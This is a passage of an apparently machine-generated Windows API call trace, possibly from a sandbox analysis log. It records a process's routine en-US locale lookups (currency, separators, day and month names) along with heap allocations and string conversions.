RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2) returned 0x66ee38 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2000001a, lpLCData=0x14e878, cchData=2 | out: lpLCData="\x02") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20000019, lpLCData=0x14e8b4, cchData=2 | out: lpLCData="\x02") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20000054, lpLCData=0x14e8a0, cchData=2 | out: lpLCData="\x01") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20000055, lpLCData=0x14e88c, cchData=2 | out: lpLCData="") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20000056, lpLCData=0x14e878, cchData=2 | out: lpLCData="\x01") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20000057, lpLCData=0x14e8b4, cchData=2 | out: lpLCData="") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20000052, lpLCData=0x14e8a0, cchData=2 | out: lpLCData="\x03") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20000053, lpLCData=0x14e88c, cchData=2 | out: lpLCData="") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x15, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.980] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x66ee48 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x15, lpLCData=0x66ee48, cchData=4 | out: lpLCData="USD") returned 4 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x14, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.980] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x66ee58 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x14, lpLCData=0x66ee58, cchData=2 | out: lpLCData="$") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x16, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.980] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x66ee68 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x16, lpLCData=0x66ee68, cchData=2 | out: lpLCData=".") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x17, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.980] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x66ee78 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x17, lpLCData=0x66ee78, cchData=2 | out: lpLCData=",") returned 2 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x50, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 1 [0166.980] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2) returned 0x66ee88 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x50, lpLCData=0x66ee88, cchData=1 | out: lpLCData="") returned 1 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x51, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.980] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x66ee98 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x51, lpLCData=0x66ee98, cchData=2 | out: lpLCData="-") returned 2 [0166.980] GetLastError () returned 0x0 [0166.980] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0xe, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0xe, lpLCData=0x14e838, cchData=2 | out: lpLCData=".") returned 2 [0166.981] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=-1, lpMultiByteStr=0x14e8b8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".", lpUsedDefaultChar=0x0) returned 2 [0166.981] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2) returned 0x637c58 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0xf, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0xf, lpLCData=0x14e828, cchData=2 | out: lpLCData=",") returned 2 [0166.981] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=",", cchWideChar=-1, lpMultiByteStr=0x14e8a4, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",", lpUsedDefaultChar=0x0) returned 2 [0166.981] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x2) returned 0x637c68 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x10, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x10, lpLCData=0x14e808, cchData=4 | out: lpLCData="3;0") returned 4 [0166.981] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3;0", cchWideChar=-1, lpMultiByteStr=0x14e890, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3;0", lpUsedDefaultChar=0x0) returned 4 [0166.981] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637c78 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0xe, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.981] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637c88 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0xe, lpLCData=0x637c88, cchData=2 | out: lpLCData=".") returned 2 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0xf, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 2 [0166.981] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637c98 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0xf, lpLCData=0x637c98, cchData=2 | out: lpLCData=",") returned 2 [0166.981] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66edb8 | out: hHeap=0x5d0000) returned 1 [0166.981] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x673198 | out: hHeap=0x5d0000) returned 1 [0166.981] GetLastError () returned 0x0 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x31, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x31, lpLCData=0x14e818, cchData=4 | out: lpLCData="Mon") returned 4 [0166.981] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Mon", cchWideChar=-1, lpMultiByteStr=0x14e8a4, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mon", lpUsedDefaultChar=0x0) returned 4 [0166.981] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x66edb8 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x32, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x32, lpLCData=0x14e808, cchData=4 | out: lpLCData="Tue") returned 4 [0166.981] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Tue", cchWideChar=-1, lpMultiByteStr=0x14e890, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tue", lpUsedDefaultChar=0x0) returned 4 [0166.981] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637ca8 [0166.981] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x33, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x33, lpLCData=0x14e7f8, cchData=4 | out: lpLCData="Wed") returned 4 [0166.982] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Wed", cchWideChar=-1, lpMultiByteStr=0x14e87c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wed", lpUsedDefaultChar=0x0) returned 4 [0166.982] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637cb8 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x34, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x34, lpLCData=0x14e828, cchData=4 | out: lpLCData="Thu") returned 4 [0166.982] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thu", cchWideChar=-1, lpMultiByteStr=0x14e8a8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thu", lpUsedDefaultChar=0x0) returned 4 [0166.982] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637cc8 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x35, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x35, lpLCData=0x14e808, cchData=4 | out: lpLCData="Fri") returned 4 [0166.982] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Fri", cchWideChar=-1, lpMultiByteStr=0x14e894, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fri", lpUsedDefaultChar=0x0) returned 4 [0166.982] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637cd8 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x36, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x36, lpLCData=0x14e7f8, cchData=4 | out: lpLCData="Sat") returned 4 [0166.982] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Sat", cchWideChar=-1, lpMultiByteStr=0x14e880, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sat", lpUsedDefaultChar=0x0) returned 4 [0166.982] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637ce8 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x37, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x37, lpLCData=0x14e7e8, cchData=4 | out: lpLCData="Sun") returned 4 [0166.982] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Sun", cchWideChar=-1, lpMultiByteStr=0x14e86c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sun", lpUsedDefaultChar=0x0) returned 4 [0166.982] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637cf8 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2a, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 7 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2a, lpLCData=0x14e818, cchData=7 | out: lpLCData="Monday") returned 7 [0166.982] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Monday", cchWideChar=-1, lpMultiByteStr=0x14e8a8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Monday", lpUsedDefaultChar=0x0) returned 7 [0166.982] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x7) returned 0x637d08 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2b, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 8 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2b, lpLCData=0x14e808, cchData=8 | out: lpLCData="Tuesday") returned 8 [0166.982] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Tuesday", cchWideChar=-1, lpMultiByteStr=0x14e894, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tuesday", lpUsedDefaultChar=0x0) returned 8 [0166.982] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637d18 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2c, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 10 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2c, lpLCData=0x14e7e8, cchData=10 | out: lpLCData="Wednesday") returned 10 [0166.982] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Wednesday", cchWideChar=-1, lpMultiByteStr=0x14e880, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wednesday", lpUsedDefaultChar=0x0) returned 10 [0166.982] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xa) returned 0x643138 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2d, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.982] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2d, lpLCData=0x14e7d8, cchData=9 | out: lpLCData="Thursday") returned 9 [0166.983] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thursday", cchWideChar=-1, lpMultiByteStr=0x14e86c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thursday", lpUsedDefaultChar=0x0) returned 9 [0166.983] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x9) returned 0x643150 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2e, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 7 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2e, lpLCData=0x14e818, cchData=7 | out: lpLCData="Friday") returned 7 [0166.983] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Friday", cchWideChar=-1, lpMultiByteStr=0x14e8a8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Friday", lpUsedDefaultChar=0x0) returned 7 [0166.983] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x7) returned 0x637d28 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2f, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2f, lpLCData=0x14e808, cchData=9 | out: lpLCData="Saturday") returned 9 [0166.983] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Saturday", cchWideChar=-1, lpMultiByteStr=0x14e894, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Saturday", lpUsedDefaultChar=0x0) returned 9 [0166.983] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x9) returned 0x643168 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x30, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 7 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x30, lpLCData=0x14e7f8, cchData=7 | out: lpLCData="Sunday") returned 7 [0166.983] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Sunday", cchWideChar=-1, lpMultiByteStr=0x14e880, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sunday", lpUsedDefaultChar=0x0) returned 7 [0166.983] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x7) returned 0x637d38 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x44, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x44, lpLCData=0x14e7e8, cchData=4 | out: lpLCData="Jan") returned 4 [0166.983] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Jan", cchWideChar=-1, lpMultiByteStr=0x14e86c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Jan", lpUsedDefaultChar=0x0) returned 4 [0166.983] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637d48 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x45, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x45, lpLCData=0x14e828, cchData=4 | out: lpLCData="Feb") returned 4 [0166.983] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Feb", cchWideChar=-1, lpMultiByteStr=0x14e8a8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Feb", lpUsedDefaultChar=0x0) returned 4 [0166.983] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637d58 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x46, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x46, lpLCData=0x14e808, cchData=4 | out: lpLCData="Mar") returned 4 [0166.983] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Mar", cchWideChar=-1, lpMultiByteStr=0x14e894, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mar", lpUsedDefaultChar=0x0) returned 4 [0166.983] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637d68 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x47, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.983] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x47, lpLCData=0x14e7f8, cchData=4 | out: lpLCData="Apr") returned 4 [0166.983] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Apr", cchWideChar=-1, lpMultiByteStr=0x14e880, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Apr", lpUsedDefaultChar=0x0) returned 4 [0166.983] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637d78 [0166.984] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x48, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.984] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x48, lpLCData=0x14e7e8, cchData=4 | out: lpLCData="May") returned 4 [0166.984] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="May", cchWideChar=-1, lpMultiByteStr=0x14e86c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="May", lpUsedDefaultChar=0x0) returned 4 [0166.984] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637d88 [0166.984] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x49, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.984] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x49, lpLCData=0x14e828, cchData=4 | out: lpLCData="Jun") returned 4 [0166.984] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Jun", cchWideChar=-1, lpMultiByteStr=0x14e8a8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Jun", lpUsedDefaultChar=0x0) returned 4 [0166.984] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637d98 [0166.984] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4a, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.984] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4a, lpLCData=0x14e808, cchData=4 | out: lpLCData="Jul") returned 4 [0166.984] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Jul", cchWideChar=-1, lpMultiByteStr=0x14e894, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Jul", lpUsedDefaultChar=0x0) returned 4 [0166.984] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637da8 [0166.984] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4b, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.984] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4b, lpLCData=0x14e7f8, cchData=4 | out: lpLCData="Aug") returned 4 [0166.984] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Aug", cchWideChar=-1, lpMultiByteStr=0x14e880, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Aug", lpUsedDefaultChar=0x0) returned 4 [0166.984] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637db8 [0166.985] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4c, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.985] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4c, lpLCData=0x14e7e8, cchData=4 | out: lpLCData="Sep") returned 4 [0166.985] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Sep", cchWideChar=-1, lpMultiByteStr=0x14e86c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sep", lpUsedDefaultChar=0x0) returned 4 [0166.985] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637dc8 [0166.985] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4d, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.985] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4d, lpLCData=0x14e828, cchData=4 | out: lpLCData="Oct") returned 4 [0166.985] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Oct", cchWideChar=-1, lpMultiByteStr=0x14e8a8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Oct", lpUsedDefaultChar=0x0) returned 4 [0166.985] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637dd8 [0166.985] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4e, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.985] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4e, lpLCData=0x14e808, cchData=4 | out: lpLCData="Nov") returned 4 [0166.985] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Nov", cchWideChar=-1, lpMultiByteStr=0x14e894, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Nov", lpUsedDefaultChar=0x0) returned 4 [0166.985] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637de8 [0166.985] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4f, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.985] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4f, lpLCData=0x14e7f8, cchData=4 | out: lpLCData="Dec") returned 4 [0166.986] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Dec", cchWideChar=-1, lpMultiByteStr=0x14e880, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dec", lpUsedDefaultChar=0x0) returned 4 [0166.986] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637df8 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x38, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 8 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x38, lpLCData=0x14e7d8, cchData=8 | out: lpLCData="January") returned 8 [0166.986] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="January", cchWideChar=-1, lpMultiByteStr=0x14e86c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="January", lpUsedDefaultChar=0x0) returned 8 [0166.986] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637e08 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x39, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x39, lpLCData=0x14e818, cchData=9 | out: lpLCData="February") returned 9 [0166.986] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="February", cchWideChar=-1, lpMultiByteStr=0x14e8a8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="February", lpUsedDefaultChar=0x0) returned 9 [0166.986] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x9) returned 0x643180 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3a, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 6 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3a, lpLCData=0x14e808, cchData=6 | out: lpLCData="March") returned 6 [0166.986] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="March", cchWideChar=-1, lpMultiByteStr=0x14e894, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="March", lpUsedDefaultChar=0x0) returned 6 [0166.986] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6) returned 0x637e18 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3b, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 6 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3b, lpLCData=0x14e7f8, cchData=6 | out: lpLCData="April") returned 6 [0166.986] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="April", cchWideChar=-1, lpMultiByteStr=0x14e880, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="April", lpUsedDefaultChar=0x0) returned 6 [0166.986] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6) returned 0x637e28 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3c, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3c, lpLCData=0x14e7e8, cchData=4 | out: lpLCData="May") returned 4 [0166.986] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="May", cchWideChar=-1, lpMultiByteStr=0x14e86c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="May", lpUsedDefaultChar=0x0) returned 4 [0166.986] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x637e38 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3d, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 5 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3d, lpLCData=0x14e818, cchData=5 | out: lpLCData="June") returned 5 [0166.986] WideCharToMultiByte (in: 